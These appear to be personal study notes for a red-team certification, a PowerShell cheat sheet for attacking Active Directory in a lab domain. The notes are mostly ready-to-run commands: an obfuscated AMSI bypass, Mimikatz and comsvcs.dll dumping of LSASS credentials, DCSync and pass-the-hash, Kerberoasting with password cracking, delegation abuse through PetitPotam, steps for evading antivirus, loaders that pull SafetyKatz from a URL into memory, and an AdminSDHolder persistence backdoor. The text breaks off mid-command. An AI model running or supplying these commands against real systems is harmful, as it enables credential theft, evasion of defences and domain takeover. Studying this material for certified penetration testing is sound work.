[CRTP METHODOLODY USING POWERSHELL]
POWERSHELL ENUMERATION
DOMAIN ENUMERATION
ACTIVE DIRECTORY POWERSHELL MODULE | ADModule BLOODHOUND | BloodHound >> avoid detections like ATA (using sharphound collector to create the .zip file with the relationships associated) C1: PS> Invoke-BloodHound -CollectionMethod All -ExcludeDC POWERVIEW | PowerView SHARPVIEW | SharpView :::GET CURRENT DOMAIN C1: PS> Get-Domain | (powerview) C2: PS> Get-ADDomain | (active directory module) | :::GET OBJECT OF ANOTHER DOMAIN C1: PS> Get-Domain -DomainC2: PS> Get-ADDomain -Identity | :::GET DOMAIN SID FOR THE CURRENT DOMAIN C1: PS> Get-DomainSID C2: PS> (Get-ADDomain).DomainSID | :::GET DOMAIN POLICY FOR CURRENT DOMAIN C1: PS> Get-DomainPolicyData C2: PS> Get-DomainPolicy C3: PS> (Get-DomainPolicyData).systemaccess | | :::GET DOMAIN POLICY FOR ANOTHER DOMAIN C1: PS> (Get-DomainPolicyData –domain [domain]).systemaccess :::GET DOMAIN CONTROLLER FOR THE CURRENT DOMAIN C1: PS> Get-DomainController C2: PS> Get-ADDomainController | :::GET DOMAIN CONTROLLER FOR ANOTHER DOMAIN C1: PS> Get-DomainController -Domain [domainName] C2: PS> Get-ADDomainController -DomainName [domainName] -Discover | PS BYPASS EXECUTION & AV SIGNATURES
EXECUTION PS> powershell -ExecutionPolicy bypass [script.ps1] PS> powershell -c [script.ps1] :::INVISI-SHELL works really well to bypass: - script block logging - system wide transcription invisi-shell | bypass security controls ** required the .dll file and the execution file needed [admin/non-admin] RunWithPathAsAdmin.bat RunWithRegistryNonAdmin.bat :::BYPASS AV SIGNATURES- load script in memory to avoid AMSI bypass AMSI Trigger to identify the part of the script that is detected !! Repeat the process until it is not detected to avoid detection on execution phase. | AMSITrigger quick usage: PS> AmsiTrigger.exe -i [filePath] FLAGS: -i = input file -u, --url=VALUE -f, --format=VALUE OUTPUT FORMAT: 1 - Only show Triggers 2 - Show Triggers with Line numbers 3 - Show Triggers inline with code 4 - Show AMSI calls (xmas tree mode) QUCIK STEPS TO BYPASS AV DETECTION WHEN MAKING CHANGES TO THE SCRIPT 1) remove comments 2) modify each use of "DumpCreds" SAMPLE: DumpCreds = DC 3) modify the name of the WIN32 API calls detected 4) reverse the strings that are detected. SAMPLE: System.AppDomain = "niamoDppA.metsyS" :::FULL OBFUSCATION Invoke-Obfuscation :::AMSI BYPASS "just copy & paste, it will let you import script without detection." works really well with Powerview. S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE ( ('1Q'+'2U') +'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i') ,'c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} ) DOMAIN ACL ENUMERATION
DESCRIPTION: ::: ENUMERATE ACL FOR DOMAIN ADMIN GROUP in case another domain group is needed, just change it... PS> Get-DomainObjectAcl -Identity "Domain Admins" -ResolveGUIDs –Verbose ::: GET ACL ASSOCIATED WITH THE SPECIFIED OBJECT PS> Get-DomainObjectAcl -SamAccountName [username] -ResolveGUIDs ::: GET ACL ASSOCIATED WITH THE SPECIFIED PREFIX TO BE USED FOR SEARCH PS> Get-DomainObjectAcl -SearchBase "STRING" -ResolveGUIDs -Verbose ::: ENUMERATE ACLs USING ACTIVEDIRECTORY MODULE *** by ObjectDN PS> (Get-Acl 'AD:\CN=Administrator,CN-Users,CD=dollarcorp,DC=moneycorp,DC=local').Access ::: SEARCH FOR INTERESTING ACEs PS> Find-InterestingDomainAcl -ResolveGUIDs ::: FIND INTERESTING ACL ASSOCIATED TO A GROUP PS> Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "group_name"} ::: GET ACL ASSOCIATED WITH SPECIFIED PATH PS> Get-PathAcl -Path "\\[domain]\sysvol" ::: SHOW CURRENT ACL FOR A SPECIFIC USER PS> Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -eq ""} note: ?{$_. = means find everything DOMAIN COMPUTER ENUMERATION
DESCRIPTION: :::GET A LIST OF COMPUTERS IN THE CURRENT DOMAIN PS> Get-DomainComputer | select Name PS> Get-DomainComputer -OperatingSystem "*Server 2016*" PS> Get-DomainComputer -Ping PS> Get-ADComputer -Filter * | select Name PS> Get-ADComputer -Filter * -Properties * PS> Get-ADComputer -Filter 'OperatingSystem -like "*Server 2016*"' -Properties OperatingSystem | select Name,OperatingSystem PS> Get-ADComputer -Filter * -Properties DNSHostname | %{Test-Connection -Count 1 -ComputerName $_.DNSHostName}DOMAIN FOREST ENUMERATION
DESCRIPTION: -FOREST- ::: GET DETAILS ABOUT THE CURRENT FOREST PS> Get-Forest PS> Get-Forest -ForestPS> Get-ADForest PS> Get-ADForest - Identity ::: GET ALL DOMAINS IN THE CURRENT FOREST PS> Get-ForestDomain PS> Get-ForestDomain -Forest PS> (Get-ADForest).Domains ::: GET ALL GLOBAL CATALOGS FOR THE CURRENT FOREST PS> Get-ForestGlobalCatalog PS> Get-ForestGlobalCatalog -Forest PS> Get-ADForest | select -ExpandProperty GlobalCatalogs ::: MAP TRUST OF A FOREST PS> Get-ForestTrust PS> Get-ForestTrust -Forest [domain] PS> Get-ADTrust -Filter 'msDS-TrustForestTrustInfo -ne "$null"' DOMAIN GPO ENUMERATION
DESCRIPTION: -GPO- ::: GET LIST OF GPO IN CURRENT DOMAIN PS> Get-DomainGPO PS> Get-DomainGPO -ComputerIdentity [hostname] ::: GET GPO WHICH USE RESTRICTED GROUPS OR groups.xml FOR INTERESTING USERS PS> Get-DomainGPOLocalGroup ::: GET USERS WHICH ARE IN A LOCAL GROUP OF A MACHINE USING GPO PS> Get-DomainGPOComputerLocalGroupMapping -ComputerIdentity [hostname] ::: GET MACHINES WHERE THE GIVEN USER IS MEMBER OF A SPECIFIC GROUP PS> Get-DomainGPOUserLocalGroupMapping -Identity [user] -Verbose ::: GET GPO APPLIED ON AN OU. READ GPOname FROM GPLINK ATTRIBUTE FROM Get-NetOU PS> Get-DomainGPO -Identity "gplink/cn" SAMPLE: PS> Get-DomainGPO -Identity {00000000-0000-0000-0000-000000000000} ::: GET GPLINK ATTRIBUTE OF A GPO PS> (Get-DomainOU -Identity [OU]).gplinkDOMAIN TRUST ENUMERATION
DESCRIPTION: -TRUSTS- - one way trust | users can access resources in one way, reverse is not allowed. - two way trust | bi-directional access is allowed TRANSITIVE: can be extended to establish trust relationships with other domains. NON-TRANSITIVE: cannot be extended to other domains in the forest. can be two-way or one-way. > parent-child trust > tree-root trust --both use two-way transitive trust > external trust | between two domains in different forest when forest do not have a trust relationship can be two-way or one-way and it is non-transitive > forest trust | between root domains, can be one-way or two-way, transitive or non-transitive Is a relationship between two domains or forests which allows users of one domain or forest to access resources in the other domain or forest. Trust can be automatic (parent-child, same forest etc.) or established (forest, external). TDO / Trusted Domain Objects (represent the trust relation in a domain) ::: GET LIST OF ALL DOMAIN TRUSTS FOR THE CURRENT DOMAIN PS> Get-DomainTrust PS> Get-DomainTrust -Domain [domain] PS> Get-ADTrust PS> Get-ADTrust -Identity [domain] ::: LIST ALL TRUST CURRENT FOREST AD MODULE PS> Get-ADForest | %{Get-ADTrust -Filter *} ::: LIST TRUST IN CURRENT DOMAIN PS> Get-DomainTrust | ?{$_.TrustAttributes -eq "FILTER_SIDS"} PS> Get-ADTrust -Filter '(intraForest -ne $True) -and (ForestTransitive -ne $True)' ::: LIST EXTERNAL TRUST IN CURRENT FOREST PS> Get-ForestDomain | %{Get-DomainTrust -Domain $_.Name} | ?{$_.TrustAttributes -eq "FILTER_SIDS"} PS> (Get-ADForest).Domains | %{Get-ADTrust -Filter '(intraForest -ne $True) -and (ForestTransitive -ne $True)' -Server $_} ::: MAP TRUSTS OF A FOREST PS> Get-ForestTrust PS> Get-ForestTrust -ForestPS> Get-ADTrust -Filter 'msDS-TrustForestTrustInfo -ne "$null"' ::: MAP TRSUTS OF CURRENT DOMAIN PS> Get-ADTrust -Filter * ::: MAP TRUSTS OF EXTERNAL TRUST PS> Get-ADTrust -Filter * -Server [xternalTrust] DOMAIN USER ENUMERATION
DESCRIPTION: :::GET LIST OF USER IN CURRENT DOMAIN PS> Get-DomainUser PS> Get-DomainUser -Identity [user] PS> Get-ADUser -Filter * -Properties * PS> Get-ADUser -Identity [userName] -Properties * :::GET LIST OF USERS BY NAME AND ITS COUNT PS> Get-DomainUser | select samaccountname | measure :::GET LIST OF A SPECIFIC PROPERTY OF USERS PS> Get-DomainUser | select -ExpandProperty samaccountname :::GET LIST OF PROPERTIES OF A USER IN CURRENT DOMAIN PS> Get-DomainUser -Identity [user] -Properties * PS> Get-DomainUser -Properties samaccountname,logonCount ||| will help to retrieve and understand the normal activity of users PS> Get-ADUser -Filter * -Properties * | select -First 1 | Get-Member -MemberType *Property | select Name PS> Get-ADUser -Filter * -Properties * | select name,logoncount,@{expression={[datetime]::fromFileTime($_.pwdlastset)}} :::SEARCH FOR A STRING IN A USER'S ATTRIBUTE PS> Get-DomainUser -LDAPFilter "Description=*STRING*" | select name,Description PS> Get-ADUser -Filter 'Description -like "*STRING*"' -Properties Description | select name,Description :::GET ACTIVELY LOGGED USERS ON A COMPUTER (NEED LOCAL ADMIN RIGHTS ON THE TARGET) PS> Get-NetLoggedon -ComputerName [hostname] :::GET LOCALLY LOGGED USERS ON A COMPUTER (NEED REMOTE REGISTRY ON THE TARGET - STARTED BY DEFAULT ON SERVER OS) PS> Get-LoggedonLocal -ComputerName [hostname] :::GET THE LAST LOGGED USER ON A COMPUTER (NEED ADMIN RIGHTS AND REMOTE REGISTRY ON THE TARGET) PS> Get-LastLoggedOn -ComputerName [hostname] ::: GET USERS INFO TO CATCH DECOY USERS PS> Get-DomainUser | select samaccountname,logoncountDOMAIN ENUMERATION USERHUNTING
DESCRIPTION: ::: FIND ALL MACHINES ON THE CURRENT DOMAIN WHERE THE CURRENT USER HAS LOCAL ADMIN ACCESS PS> Find-LocalAdminAccess –Verbose - This function queries the DC of the current or provided domain for a list of computers (Get-NetComputer) and then use multi-threaded "Invoke -CheckLocalAdminAccess" on each machine. - This can also be done with the help of remote administration tools like WMI and PowerShell remoting. Pretty useful in cases ports (RPC and SMB) used by "Find-LocalAdminAccessare" blocked. - See "Find-WMILocalAdminAccess.ps1" and "Find-PSRemotingLocalAdminAccess.ps1" ::: FIND COMPUTERS WHERE A DOMAIN ADMIN (OR SPECIFIED USER/GROUP) HAS SESSIONS PS> Find-DomainUserLocation -Verbose PS> Find-DomainUserLocation -UserGroupIdentity "[group]" This function queries the DC of the current or provided domain for members of the given group (Domain Admins by default) using "Get-DomainGroupMember", gets a list of computers (Get-DomainComputer) and list sessions and logged on users "(Get-NetSession/Get-NetLoggedon)" from each machine. ::: FIND COMPUTERS WHERE A DOMAIN ADMIN SESSION IS AVAILABLE & CURRENT USER HAS ADMIN ACCESS PS> Find-DomainUserLocation -CheckAccess ::: FIND COMPUTERS (FILE SERVERS AND DISTRIBUTED FILE SERVERS) WHERE A DOMAIN ADMIN SESSION IS AVAILABLE PS> Find-DomainUserLocation -StealthDOMAIN GROUP MEMBERS ENUMERATION
DESCRIPTION: :::GET ALL GROUPS IN THE CURRENT DOMAIN PS> Get-DomainGroup | select Name PS> Get-DomainGroup -DomainPS> Get-ADGroup -Filter * | select Name PS> Get-ADGroup -Filter * -Properties * :::GET ALL GROUPS CONTAINING THE WORD "admin" IN GROUP NAME PS> Get-DomainGroup *admin* PS> Get-ADGroup -Filter 'Name -like "*admin*"' | select Name :::GET ALL MEMBERS OF THE DOMAIN ADMIN GROUP PS> Get-DomainGroupMember -Identity "Domain Admins" -Recurse PS> Get-ADGroupMember -Identity "Domain Admins" -Recursive ::: GET THE GROUP MEMBERSHIP FOR A USER PS> Get-DomainGroup -UserName " " PS> Get-ADPrincipalGroupMembership -Identity ::: LIST ALL LOCAL GROUPS ON A MACHINE (NEED ADMIN RIGHTS ON NON-DC MACHINES) PS> Get-NetLocalGroup -ComputerName -ListGroups ::: GET MEMBERS OF ALL THE LOCAL GROUPS ON A MACHINE (NEED ADMIN RIGHTS ON NON-DC MACHINES) PS> Get-NetLocalGroup -ComputerName -Recurse ::: GET MEMBRERS OF ALL THE LOCAL GROUP "Administrators" ON A MACHINE (NEED ADMIN RIGHTS ON NON-DC MACHINES) PS> Get-NetLocalGroupMember -ComputerName -GroupName Administrators ::: FIND SHARES ON HOSTS IN CURRENT DOMAIN PS> Invoke-ShareFinder -Verbose ::: FIND SENSITIVE FILES ON COMPUTERS IN THE DOMAIN PS> Invoke-FileFinder -Verbose ::: GET ALL FILESERVERS OF THE DOMAIN PS> Get-NetFileServer ::: GET KERBEROS POLICY PS> (Get-DomainPolicy).KerberosPolicy ::: GET DOMAIN ADMIN_GROUPS OF FOREST PS> Get-DomainGroup *admin* -domain | select samaccountname POWERSHELL LATERAL MOVEMENT
DOMAIN LATERAL MOVEMENT
DESCRIPTION: :: powershell remoting (PSRemoting) uses WinRM | ports: 5985 HTTP & 5986 HTTPS | required: "Enable-PSRemoting" - two types: 1:1 | 1:many >>> 1:1 PSSession: interactive | runs in a new process (wsmprovhost) | is stateful PS> New-PSSession PS> Enter-PSSession >>> 1:many non-interactive | fan-out remoting PS> Invoke-CommandDOMAIN LATERAL MOVEMENT MIMIKATZ
DESCRIPTION: >> invoke-mimikatz "Invoke-Mimikatz" is a powershell script, using the code from ReflectivePEInjection, mimikatz is loaded reflectively into the memory. all functions of mimikatz could be used from this script. (script needs rights to dump credentials) >>> EXTRACTING CREDENTIALS FROM LSASS ::: DUMP CREDENTIALS ON A LOCAL MACHINE USING MIMIKATZ PS> Invoke-Mimikatz -Command '"sekurlsa::ekeys"' ::: USING SAFETYKATZ (minidump of LSASS and PELoader to run Mimikatz) PS> SafetyKatz.exe "sekurlsa::ekeys" ::: DUMP CREDENTIALS USING SHARPKATZ (C# port of some of mimikatz functions PS> SharpKatz.exe --Command ekeys ::: DUMP CREDENTIALS USING DUMPERT (Direct System Calls and API unhooking) PS> rundll32.exe C:\Dumpert\Outflank-Dumpert.dll, Dump ::: USING PYPYKATZ (mimikatz functionanlity in Python) PS> pypykatz.exe live lsa ::: USING comsvcs.dll PS> tasklist /FI "IMAGENAME eq lsass.exe" rundll32.exe C:\windows\System32\comsvcs.dll, MiniDumpC:\Users\Public\lsass.dmp full >>> OVERPASS-THE-HASH (OPTH) "generate tokens from hashes or keys" - (needs admin rights) PS> Invoke-Mimikatz -Command '"sekurlsa::pth /user:Administrator /domain:us.techcorp.local /aes256:[aes256key] /run:powershell.exe"' PS> Safetykatz.exe '"sekurlsa::pth /user:administrator /domain:us.techcorp.local /aes256:[aes256key] /run:cmd.exe" "exit" NOTE: those will generate a powershell session with logon type 9 (same as runas /netonly) NOTE: using Rubeus.exe the following command doesn't need elevation PS> Rubeus.exe asktgt /user:administrator /rc4:[ntlmhash] /ptt instead, the following needs rights PS> Rubeus.exe asktgt /user:administrator /aes256: /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt >>> DCSync "extract credentials from the DC without code execution on it" ::: DCSync FEATURE FOR GETTING KRBTGTHASH NOTE: Domain Admins privileges are required to run DCSync PS> Invoke-Mimikatz -Command '"lsadump::dcsync /user:us\krbtgt"' PS> SafetyKatz.exe "lsadump::dcsync /user:us\krbtgt" "exit" DOMAIN LATERAL MOVEMENT PSREMOTING
DESCRIPTION: --POWERSHELL REMOTING-- ::: USE BELOW TO EXECUTE COMMANDS OR SCRIPTBLOCKS PS> Invoke-Command -Scriptblock {Get-Process} -ComputerName (Get-Content [list_of_servers]) ::: USE BELOW TO EXECUTE SCRIPTS FROM FILES PS> Invoke-Command –FilePath C:\scripts\Get-PassHashes.ps1 -ComputerName (Get-Content [list_of_servers]) ::: USE BELOW TO EXECUTE LOCALLY LOADED FUNCTION ON THE REMOTE MACHINES PS> Invoke-Command -ScriptBlock ${function:Get-PassHashes} -ComputerName (Get-Content [list_of_servers]) ::: PASSING ARGUMENTS: only possitional arguments could be passed this way PS> Invoke-Command -ScriptBlock ${function:Get-PassHashes} -ComputerName (Get-Content [list_of_servers]) -ArgumentList ::: USE BELOW TO EXECUTE "stateful" COMMANDS USING (Invoke-Command) PS> $Sess = NEw-PSSession -Computername [hostname] Invoke-Command -Session $Sess -ScriptBlock {$Proc = Get-Process} Invoke-Command -Session $Sess -ScriptBlock {$Proc.Name} --POWERSHELL REMOTING TRADECRAFT-- - supports the system-wide transcripts and deep script block logging TIP: We can use winrs in place of PSRemoting to evade the logging and still reap the benefit of 5985 allowed between hosts PS> winrs -remote:server1 -u:server1\administrator -p:Pass@1234 hostnamePOWERSHELL PRIVESC
DOMAIN LOCAL PRIVESC
DESCRIPTION: PowerUp ||| LOCAL ||| ::: GET SERVICES WITH UNQUOATED PATHS AND A SPACE IN THEIR NAME PS> Get-ServiceUnquoted -Verbose ::: GET SERVICES WHERE THE CURRENT USER CAN WRITE TO ITS BINARY PATH OR CHANGE ARGUMENTS TO THE BINARY PS> Get-ModifiableServiceFile -Verbose ::: GET THE SERVICES WHOSE CONFIGURATION CURRENT USER CAN MODIFY PS> Get-ModifiableService -Verbose ::: ABUSE FUNCTION FOR "Get-ModifiableService" & ADD OUR CURRENT DOMAIN USER TO THE LOCAL ADMINISTRATORS GROUP PS> Invoke-ServiceAbuse -Name 'service_name' -UserName 'domain\user' ::: CHECK FOR DIFFERENT OPTIONS REGARDING THE WAYS OF ABUSE FUNCTION ASSOCIATED PS> help Invoke-ServiceAbuse -Examples ::: RUN ALL CHECKS PS> Invoke-AllChecks ::: FIND A MACHINE IN THE DOMAIN WHERE THE USER ADDED TO "local admin group" HAS LOCAL ADMIN ACCESS PS> import module and invoke "Find-PSRemotingLocalAdminAccess" ::: SHOW SECURITY DESCRIPTORS OF A SERVICE PS> sc.exe sdshow {service_name} PS> sc.exe sdshow snmptrap NOTE: when cheking results. if exist a fifth parenthesis and at the end of that exist something similar to the following: {;;;WD)} it means "everyone". All the letters that compose every parenthesis means the different permissons assigned.DOMAIN PRIVESC KERBEROAST
DESCRIPTION: ::: FIND USER ACCOUNTS USED AS "SERVICE ACCOUNTS" - ActiveDirectorymodule PS> Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName - PowerView PS> Get-DomainUser –SPN ::: USE RUBEUS TO LIST Kerberoast STATS PS> Rubeus.exe kerberoast /stats ::: USE RUBEUS TO REQUEST A TGS PS> Rubeus.exe kerberoast /user:svcadmin /simple NOTE: To avoid detections based on Encryption Downgrade for Kerberos EType(used by likes of ATA -0x17 stands for rc4-hmac), look for Kerberoastableaccounts that only support RC4_HMAC PS> Rubeus.exe kerberoast /stats /rc4opsec PS> Rubeus.exe kerberoast /user:svcadmin /simple /rc4opsec ::: KERBEROAST ALL POSSIBLE ACCOUNTS PS> Rubeus.exe kerberoast /rc4opsec /outfile:hashes.txt ::: CRACK TICKET USING JOHN THE RIPPER PS> john.exe --wordlist=C:\AD\Tools\kerberoast\10k-worst-pass.txt C:\AD\Tools\hashes.txtDOMAIN PRIVESC KERBEROAST ASREPs
DESCRIPTION: If a user's UserAccountControl settings have "Do not require Kerberos preauthentication" enabled i.e. Kerberos preauth is disabled, it is possible to grab user's crackable AS-REP and brute-force it offline. With sufficient rights (GenericWrite or GenericAll), Kerberos preauth can be forced disabled as well. ::: Enumerating accounts with Kerberos Preauthdisabled - Using PowerView PS> Get-DomainUser -PreauthNotRequired -Verbose - Using ActiveDirectorymodule PS> Get-ADUser -Filter {DoesNotRequirePreAuth -eq $True} -Properties DoesNotRequirePreAuth Force disable Kerberos Preauth: ENUMERATE THE PERMISSIONS FOR RDPUsers ON ACLs USING PowerView PS> Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "RDPUsers"} PS> Set-DomainObject -Identity Control1User -XOR @{useraccountcontrol=4194304} –Verbose PS> Get-DomainUser -PreauthNotRequired -Verbose Request encrypted AS-REP for offline brute-force Let's use ASREPRoast PS> Get-ASREPHash -UserName VPN1user -Verbose To enumerate all users with Kerberos preauthdisabled and request a hash PS> Invoke-ASREPRoast -Verbose We can use John The Ripper to brute-force the hashes offline PS> john.exe --wordlist=C:\AD\Tools\kerberoast\10k-worst-pass.txt C:\AD\Tools\asrephashes.txtDOMAIN PRIVESC KERBEROAST SetPN
DESCRIPTION: - With enough rights (GenericAll/GenericWrite), a target user's SPN can be set to anything (unique in the domain). - We can then request a TGS without special privileges. The TGS can then be "Kerberoasted". ::: ENUMERATE THE PERMISSIONS FOR RDPUsers ON ACLs USING PowerView(dev) PS> Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "RDPUsers"} ::: USING Powerview(dev), SEE IF THE USER ALREADY HAS A SPN PS> Get-DomainUser -Identity supportuser | select serviceprincipalname ::: USING ActiveDirectory MODULE PS> Get-ADUser -Identity supportuser -Properties ServicePrincipalName | select ServicePrincipalName ::: SET A SPN FOR THE USER (must be unique for the domain) PS> Set-DomainObject -Identity support1user -Set @{serviceprincipalname='ops/whatever1'} ::: USING ActiveDirectory MODULE PS> Set-ADUser -Identity support1user -ServicePrincipalNames@{Add='ops/whatever1'} ::: KERBEROAST THE USER PS> Rubeus.exe kerberoast /outfile:targetedhashes.txt PS> john.exe --wordlist=C:\AD\Tools\kerberoast\10k-worst-pass.txt C:\AD\Tools\targetedhashes.txtDOMAIN PRIVESC KERBEROS DELEGATION
DESCRIPTION: allows to "reuse the end-user credentials to access resources hosted on a different server" GENERAL/BASIC OR UNCONSTRAINED DELEGATION: which allows the first hop server to request access to any service on any computer in the domain. >>> When unconstrained delegation is enabled, the DC places user's TGT inside TGS (Step 4 in the previous diagram). When presented to the server with unconstrained delegation, the TGT is extracted from TGS and stored in LSASS. This way the server can reuse the user's TGT to access any other resource as the user ::: DISCOVER DOMAIN COMPUTERS WHICH HAVE UNCONSTRAINED DELEGATION ENABLED USING POWERVIEW PS> Get-DomainComputer -UnConstrained ::: USING Active Directory MODULE PS> Get-ADComputer -Filter {TrustedForDelegation -eq $True} PS> Get-ADUser -Filter {TrustedForDelegation -eq $True} - Compromise the server(s) where Unconstrained delegation is enabled. - We must trick or wait for a domain admin to connect a service on appsrv. Now, if the command is run again PS> Invoke-Mimikatz –Command '"sekurlsa::tickets /export"' The DA token could be reused PS> Invoke-Mimikatz -Command '"kerberos::pttC:\Users\appadmin\Documents\user1\[0;2ceb8b3]-2-0-60a10000-Administrator@krbtgt-DOLLARCORP.MONEYCORP.LOCAL.kirbi"' ::: PRINTER BUG A feature of MS-RPRN which allows any domain user (Authenticated User) can force any machine (running the Spooler service) to connect to second a machine of the domain user's choice. CAPTURE THE TGT OF dcorp-dc$ BY USING RUBEUS ON dcorp-appsrv reference: (https://github.com/GhostPack/Rubeus) PS> Rubeus.exe monitor /interval:5 /nowrap ...and after that run MS-RPRN.exe on the student VM. reference: (https://github.com/leechristensen/SpoolSample) PS> MS-RPRN.exe \\dcorp-dc.dollarcorp.moneycorp.local \\dcorp-appsrv.dollarcorp.moneycorp.local COPY THE base64 ENCODED TGT, REMOVE EXTRA SPACES (if any) AND USE IT ON THE STUDENT VM PS> Rubeus.exe ptt /tikcet: ONCE THE TICKET IS INJECTED, RUN DCSync PS> Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"' ::: PETIPOTAM We can also use PetitPotam.exe on dcorp-appsrv reference: (https://github.com/topotam/PetitPotam) PS> PetitPotam.exe dcorp-appsrv dcorp-dc On dcorp-appsrv PS> Rubeus.exe monitor /interval:5 "PetitPotam uses EfsRpcOpenFileRaw function of MS-EFSRPC (Encrypting File System Remote Protocol) protocol and doesn't need credentials when used against a DC" CONSTRAINED DELEGATION: which allows the first hop server (web server in our example) to request access only to specified services on specified computers. If the user is not using Kerberos authentication to authenticate to the first hop server, Windows offers Protocol Transition to transition the request to KerberosDOMAIN OFFENSIVE.NET AV BYPASS
DESCRIPTION: STRING MANIPULATION DEFENDER CHECK can be used to detect code and strings from a binary that windows defender may flag as malicious. usage: PS> DefenderCheck.exe [file] >>> STRING MANIPULATION the sample way is to edit the code using an IDE, sample, visual studio. for example, some triggers are associated to the words "credentials", so the basic way to bypass this is replacing the trigger word with another word, sample: "Credents". (remember to replace in all code") run DefenderCheck until there's no flags. ::: STRING MANIPULATION for SAFETYKATZ Page 114 1. get latest version of mimikatz & Out-CompressedDll.ps1 2. run the Out-CompressedDll.ps1 powerShell script on Mimikatz binary and save the output to a file. PS> Out-CompressedDll [Path/to/mimikatz.exe] > outputfilename.txt ::: BETTERSAFETYKATZ Page 117 ::: AV-BYPASS OBFUSCATION (ConfuserEX) Page 119 ::: PAYLOAD DELIVERY The tool "netloader" can be used to deliver the payload NETLOADER ::: LOAD BINARY FORM FILEPATH OR URL AND PATCH AMSI & ETW WHILE EXECUTING PS> C:\Users\Public\Loader.exe -path http://192.168.100.X/SafetyKatz.exe ::: USE ASSEMBLYLOAD.EXE THAT CAN BE USED TO LOAD NETLOADER IN MEMORY FROM URL WHICH THEN LOADS A BINARY FROM FILEPATH OR URL PS> C:\Users\Public\AssemblyLoad.exe http://192.168.100.X/Loader.exe -path http://192.168.100.X/SafetyKatz.exeDOMAIN OU ENUMERATION
DESCRIPTION: -OU- ::: GET OU IN A DOMAIN PS> Get-DomainOU PS> Get-ADOrganizationalUnit -Filter * -Properties * ::: GET ATTRIBUTE OF AN OU PS> (Get-DomainOU -Identity [OU]).attribute SAMPLE: PS> (Get-DomainOU -Identity Servers).gplink ::: FILTER NAME ON RESULTS PS> Get-DomainOU | select -ExpandProperty [name] ::: LIST ALL COMPUTERS IN A SPECIFIC OU PS> (Get-DomainOU -Identity [OUName]).distinguishedname | %{Get-DomainComputer -SearchBase $_} | select name % = means each result (object)POWERSHELL PERSISTENCE ACL
DOMAIN PERSISTENCE ACL ADMINSDHOLDER
DESCRIPTION: Resides in the System container of a domain and used to control the permissions -using an ACL - for certain built-in privileged groups (called Protected Groups). >> GROUPS Account Operators | Enterprise Admins | Domain Controllers | Backup Operators | Administrators Print Operators | Schema Admins | Replicator | Read-Only Domain Controller Security Descriptor Propagator (SDPROP) runs every hour and compares the ACL of protected groups and members with the ACL of AdminSDHolder and any differences are overwritten on the object ACL. ::: ACCOUNTS THAT CAN BE ABUSSED - Account Operators: Cannot modify DA/EA/BA groups. Can modify nested group within these groups. - Backup Operators: Backup GPO, edit to add SID of controlled account to a privileged group and Restore. - Server Operators: Run a command as system (using the disabled Browser service) - PrintOperators: Copy ntds.dit backup, load device drivers. >> With DA privileges (Full Control/Write permissions) on the AdminSDHolder object, it can be used as a backdoor/persistence mechanism by adding a user with Full Permissions (or other interesting permissions) to the AdminSDHolder object. >> In 60 minutes (when SDPROP runs), the user will be added with Full Control to the AC of groups like Domain Admins without actually being a member of it. ::: ADD FULLCONTROL PERMISSIONS FOR A USER TO THE AdminSDHolder USING POWERVIEW AS DA PS> Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,dc-dollarcorp,dc=moneycorp,dc=local' -PrincipalIdentity student1 -Rights All -PrincipalDomain dollarcorp.moneycorp.local -TargetDomain dollarcorp.moneycorp.local -Verbose Using ActiveDirectoryModule and RACE toolkit (https://github.com/samratashok/RACE) : PS> Set-DCPermissions -Method AdminSDHolder -SAMAccountName student1 -RightGeneric All -DistinguishedName 'CN=AdminSDHolder,CN=System,DC=dollarcorp,DC=moneycorp,DC=local' -Verbose ::: OTHER INTERESTING PERMISSIONS (ResetPassword, WriteMembers) FOR A USER TO THE AdminSDHolder PS> Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,dc-dollarcorp,dc=moneycorp,dc=local' -PrincipalIdentity student1 -Rights ResetPassword -PrincipalDomain dollarcorp.moneycorp.local -TargetDomain dollarcorp.moneycorp.local -Verbose PS> Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,dc-dollarcorp,dc=moneycorp,dc=local' -PrincipalIdentity student1 -Rights WriteMembers -PrincipalDomain dollarcorp.moneycorp.local -TargetDomain dollarcorp.moneycorp.local -Verbose ::: RUN SDProp MANUALLY USING Invoke-SDPropagator.ps1 FROM TOOLS DIRECTORY PS> Invoke-SDPropagator -timeoutMinutes 1 -showProgress -Verbose ::: For pre-Server 2008 machines PS> Invoke-SDPropagator -taskname FixUpInheritance -timeoutMinutes 1 -showProgress -Verbose ::: CHECK THE DOMAIN ADMINS PERMISSIONS -PowerView AS NORMAL USER PS> Get-DomainObjectAcl -Identity 'Domain Admins' -ResolveGUIDs | ForEach-Object {$_| Add-Member NoteProperty 'IdentityName' $(Convert-SidToName $_.SecurityIdentifier);$_} | ?{$_.IdentityName -match "student1"} ::: USING ACTIVE DIRECTORY MODULE PS> (Get-Acl -Path 'AD:\CN=Domain Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local').Access | ?{$_.IdentityReference -match 'student1'} ::: ABUSING FULL CONTROL USING PowerView PS> Add-DomainGroupMember -Identity 'Domain Admins' -Members testda -Verbose ::: USING ACTIVE DIRECTORY MODULE PS> Add-ADGroupMember -Identity 'Domain Admins' -Members testda ::: ABUSING RESET PASSWORD USING POWERVIEW PS> Set-DomainUserPassword -Identity testda -AccountPassword(ConvertTo-SecureString 